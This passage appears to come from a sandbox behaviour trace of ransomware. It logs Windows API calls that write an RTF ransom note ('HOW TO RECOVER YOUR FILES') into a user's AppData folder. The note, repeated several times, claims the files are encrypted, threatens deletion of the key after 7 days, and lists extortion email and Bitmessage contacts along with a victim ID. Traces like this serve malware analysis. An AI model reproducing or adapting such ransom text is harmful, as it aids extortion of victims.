m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.445] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.445] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x236ff98, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fs\x07", lpUsedDefaultChar=0x0) returned 8717 [0295.445] WriteFile (in: hFile=0x228, lpBuffer=0x236ff98*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x236ff98*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0295.446] CloseHandle (hObject=0x228) returned 1 [0295.446] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hi\\#readme_eman#.rtf")) returned 0xffffffff [0295.446] GetLastError () returned 0x2 [0295.446] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0295.473] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 